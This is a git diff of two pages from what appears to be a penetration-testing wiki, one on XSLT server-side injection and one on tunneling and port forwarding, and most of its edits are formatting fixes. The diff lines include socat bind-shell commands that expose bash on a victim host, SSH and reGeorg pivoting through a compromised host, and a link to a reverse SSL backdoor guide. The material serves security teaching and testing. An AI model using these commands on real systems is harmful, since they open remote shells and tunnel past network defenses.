diff --git a/pentesting-web/xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md b/pentesting-web/xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md index 6278c903..8aeb268a 100644 --- a/pentesting-web/xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md +++ b/pentesting-web/xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md @@ -219,9 +219,13 @@ xmlns:php="http://php.net/xsl" > Execute code using other frameworks in the PDF -### **References** +### **More Languages** -[XSLT\_SSRF](https://feelsec.info/wp-content/uploads/2018/11/XSLT_SSRF.pdf) -[http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf) -[http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf) +**In this page you can find examples of RCE in other languajes:** [**https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection\#C%23%2FVB.NET%2FASP.NET**](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection#C%23%2FVB.NET%2FASP.NET) **\(C\#, Java, PHP\)** + +## **References** + +* [XSLT\_SSRF](https://feelsec.info/wp-content/uploads/2018/11/XSLT_SSRF.pdf) +* [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf) +* [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf) diff --git a/tunneling-and-port-forwarding.md b/tunneling-and-port-forwarding.md index 29a1c1df..ed4b3e2c 100644 --- a/tunneling-and-port-forwarding.md +++ b/tunneling-and-port-forwarding.md @@ -27,7 +27,7 @@ Local port --> Compromised host \(SSH\) --> Third\_box:Port ```bash ssh -i ssh_key @ -L :: [-p ] [-N -f] #This way the terminal is still in your host #Example -sudo ssh -L 631::631 -N -f -l +sudo ssh -L 631::631 -N -f -l ``` ### Port2hostnet \(proxychains\) @@ -121,9 +121,9 @@ python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/t [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel) -Chisel is a fast TCP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network. Chisel is very similar to crowbar though achieves much higher performance. +Chisel is a fast TCP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go \(golang\). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network. Chisel is very similar to crowbar though achieves much higher performance. -You can do port forwarding (bind & reverse), create a socks proxy (bind & reverse). +You can do port forwarding \(bind & reverse\), create a socks proxy \(bind & reverse\). ```bash root@kali:/opt# git clone https://github.com/jpillora/chisel.git @@ -152,10 +152,11 @@ root@kali:/opt/chisel# ./chisel --help ![](https://0xdf.gitlab.io/img/chisel-2.webp) Read more: -- https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html (Blog by Oxdf) -- https://github.com/jpillora/chisel -- https://www.youtube.com/watch?v=Yp4oxoQIBAM&t=1469s (HTB Reddish by ippsec) -- https://0xdf.gitlab.io/2019/01/26/htb-reddish.html (HTB Reddish by 0xdf) + +* [https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html](https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html) \(Blog by Oxdf\) +* [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel) +* [https://www.youtube.com/watch?v=Yp4oxoQIBAM&t=1469s](https://www.youtube.com/watch?v=Yp4oxoQIBAM&t=1469s) \(HTB Reddish by ippsec\) +* [https://0xdf.gitlab.io/2019/01/26/htb-reddish.html](https://0xdf.gitlab.io/2019/01/26/htb-reddish.html) \(HTB Reddish by 0xdf\) ## Rpivot @@ -190,7 +191,7 @@ victim> python client.py --server-ip --server-port 9999 --ntl ```bash victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane -attacker> socat FILE:`tty`,raw,echo=0 TCP::1337 +attacker> socat FILE:`tty`,raw,echo=0 TCP::1337 ``` ### Reverse shell @@ -232,7 +233,7 @@ OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|PROXY:hacke [https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/](https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/) -### SSL Socat Tunnel +### SSL Socat Tunnel **/bin/sh console** @@ -286,7 +287,7 @@ http-proxy 8080 ntlm [http://cntlm.sourceforge.net/](http://cntlm.sourceforge.net/) - It authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. Then, you can use the tool of your choice through this port. +It authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. Then, you can use the tool of your choice through this port. Example that forward port 443 ```text